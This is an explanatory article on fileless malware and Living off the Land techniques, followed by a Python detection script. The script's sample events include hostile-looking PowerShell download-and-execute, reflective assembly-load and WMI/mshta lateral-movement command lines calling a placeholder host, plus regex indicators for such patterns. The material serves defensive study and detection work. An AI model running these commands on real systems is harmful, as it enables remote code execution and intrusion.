Bodiless or fileless malware is malware that is not stored on the hard drive as an executable file, but is loaded directly into memory. This type of malware is dangerous because it leaves practically no trace on the disk of the infected system: there is no executable for a file scanner to examine, and the payload disappears from memory when its process ends or the device reboots, which makes it difficult both to detect and to investigate afterwards.
As a rule, fileless malware uses the capabilities of legitimate programs and operating system components in order to run and to persist in the system. For example, a malicious script can be passed as a command line parameter to an interpreter that is already installed on the computer (PowerShell's -EncodedCommand option accepts an entire Base64-encoded script this way). Attacks that use legitimate software already installed on the infected device are called Living off the Land (LotL) attacks.
How a fileless attack occurs
There are various techniques attackers can use to avoid having to save files to the disk at different stages of an attack.
- System penetration. At this stage, attackers can remotely exploit vulnerabilities in programs installed on the target device, inject malicious code into the firmware, or run the code from an external drive, such as a USB flash drive.
- Establishment of persistence. At this stage, attackers use legitimate system tools to relaunch the fileless malware if it stops running for some reason, for example when the user reboots the computer. On Windows devices, attackers can add a malicious entry to the registry (such as a value under a Run key whose command line starts PowerShell with an encoded script) or create a task in the Task Scheduler so that the malware runs whenever certain conditions are met, such as when the device is turned on or a user logs on.
- Execution of the malicious code. The malicious code itself is also run by legitimate system tools, such as a script interpreter like PowerShell, a .NET loader that maps an assembly straight from memory, or WMI, rather than by a dedicated malicious executable.
Legitimate tools in fileless attacks
Legitimate tools frequently used in fileless attacks include:
- WMI (Windows Management Instrumentation) — an interface that administrators use to query and manage devices on a corporate network. Attackers use WMI to establish persistence (a permanent event subscription binds an event filter to a consumer that runs a command or script whenever the filter's condition is met, with nothing written to disk), to bypass security controls, to steal data, to move laterally across the network (WMI can start a process on a remote host), and for other malicious purposes.
- PowerShell — a scripting shell intended for device administration. Attackers use PowerShell to launch fileless malware: the script is passed on the command line (often Base64-encoded via -EncodedCommand), downloads the next stage straight into memory, and is typically started with a hidden window and an execution-policy bypass.
- .NET — the application framework on which PowerShell is built (the Windows-only .NET Framework for Windows PowerShell, and the cross-platform .NET for PowerShell 7). Attackers use .NET features such as reflection to load an assembly from a byte array already in memory, so the executable never touches the disk, and to remove artifacts from memory.
- Windows registry — a database that holds settings for programs, user profiles, connected devices, etc. Attackers use the registry to establish fileless malware persistence (autostart entries such as Run keys) and sometimes as storage: the encoded payload is kept in a registry value, and a short launcher reads it into memory at each start.
- Windows Task Scheduler — a Windows feature for configuring the automatic execution of certain tasks, such as launching a program at a specific time. Attackers can create a task to execute fileless malware, and the system itself will run it.
Use of files in fileless malware attacks
Fileless attacks are not always completely fileless. Files are often saved to the disk at some stage of the attack, such as documents with macros that load the fileless payload into memory. Once it has done its job, the malicious file is usually deleted from the infected device, so the initial document is often the only artifact that ever existed on disk.
Fileless threat detection
Fileless attacks are difficult to detect using signature analysis, because there is no file on disk to scan. To detect bodiless malware activity, modern security systems rely on behavioral analysis, combined with additional checks of critical elements such as the registry, the Task Scheduler, WMI event subscriptions, and the PowerShell environment. On Windows, the raw material for such checks is available to defenders as well: PowerShell script block logging (Event ID 4104) records the decoded content of scripts as they run, the Antimalware Scan Interface (AMSI) passes scripts to the installed antivirus at execution time even when they were never written to disk, and process-creation auditing (Security Event ID 4688 with command line logging enabled, or Sysmon Event ID 1) captures the command lines that fileless loaders are started with.
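Many of the checks above start from a process command line, whether it comes from a Run-key value, a scheduled task action, or a process-creation event. The following Python script is an example added to this page, not code from any security product: it decodes the Base64/UTF-16LE argument that PowerShell's -EncodedCommand accepts, splices the plaintext back into the command line, and matches the result against a small illustrative set of Living off the Land indicators (hidden window, execution-policy bypass, download cradle, in-memory .NET assembly load, WMI process creation, script-host LOLBins). The indicator list is deliberately incomplete, and the sample events, host names, registry paths and addresses are all constructed for this illustration.

```python
"""Flag fileless / Living off the Land launch patterns in process command lines.

Added example. The indicator list is a small illustrative subset, not a
complete detection rule set, and every sample event below is constructed.
"""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand
# (-e, -ec, -enc, -encoded, ...); the argument is Base64 of UTF-16LE text.
_ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{8,})")

# Each indicator is matched against the command line *after* any encoded
# script has been decoded, so the encoding does not hide the behaviour.
_INDICATORS = {
    "hidden_window":      re.compile(r"(?i)-w\w*\s+hidden"),
    "policy_bypass":      re.compile(r"(?i)-e[px]\w*\s+bypass"),
    "download_cradle":    re.compile(r"(?i)Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"),
    "invoke_expression":  re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "reflective_load":    re.compile(r"(?i)Reflection\.Assembly\]?::Load"),
    "wmi_process_spawn":  re.compile(r"(?i)\bwmic(?:\.exe)?\b.*\bprocess\s+call\s+create|Win32_Process"),
    "script_host_lolbin": re.compile(r"(?i)\bmshta(?:\.exe)?\b|\brundll32(?:\.exe)?\b.*javascript:"),
}


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument; used here only to construct sample input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _decode_b64_utf16(token: str):
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid Base64, or not UTF-16LE text


def decode_encoded_command(cmdline: str):
    """Return the plaintext script passed via -EncodedCommand, or None."""
    m = _ENC_FLAG.search(cmdline)
    return _decode_b64_utf16(m.group(1)) if m else None


def analyze(cmdline: str) -> dict:
    """Decode an encoded script if present, then test the expanded line against the indicators."""
    m = _ENC_FLAG.search(cmdline)
    decoded = _decode_b64_utf16(m.group(1)) if m else None
    text = cmdline
    if decoded is not None:  # splice the plaintext in place of the Base64 blob
        text = cmdline[: m.start(1)] + decoded + cmdline[m.end(1):]
    hits = ["encoded_command"] if m else []
    hits += [name for name, rx in _INDICATORS.items() if rx.search(text)]
    return {"decoded": decoded, "indicators": hits}


def scan_events(events):
    """Return (source, indicators) for every event that trips at least one indicator."""
    findings = []
    for source, cmdline in events:
        result = analyze(cmdline)
        if result["indicators"]:
            findings.append((source, result["indicators"]))
    return findings


# Constructed sample events: where the command line was observed, and the command line.
SAMPLE_EVENTS = [
    # Persistence through a Run key: hidden, encoded PowerShell that pulls the next stage into memory
    ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "powershell.exe -nop -w hidden -enc "
     + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/s.ps1')")),
    # Persistence through a scheduled task: the action loads a .NET assembly kept in a registry value
    ("Scheduled task \\Maint\\Sync, action",
     'powershell.exe -ep bypass -c "[Reflection.Assembly]::Load([Convert]::FromBase64String('
     '(Get-ItemProperty HKCU:\\Software\\Cfg).Blob)).EntryPoint.Invoke($null,$null)"'),
    # Lateral movement: WMI starts a script host on a remote machine
    ("Sysmon Event ID 1 on WS-0042",
     'wmic.exe /node:10.0.0.17 process call create "mshta.exe http://192.0.2.10/a.hta"'),
    # Ordinary administration; should produce no indicators
    ("Sysmon Event ID 1 on WS-0042",
     'powershell.exe -NoProfile -Command "Get-Service -Name Spooler | Restart-Service"'),
]

if __name__ == "__main__":
    for source, indicators in scan_events(SAMPLE_EVENTS):
        print(f"{source}: {', '.join(indicators)}")
```

Decoding before matching is the part that matters: a rule that only looks at the raw command line sees an opaque Base64 blob and misses the download cradle entirely. In production the same logic would be fed from Security 4688 or Sysmon 1 events and from periodic dumps of Run keys, scheduled task actions and WMI consumer command lines, and the indicator list would be tuned against the organisation's own administrative scripts to keep the benign case quiet.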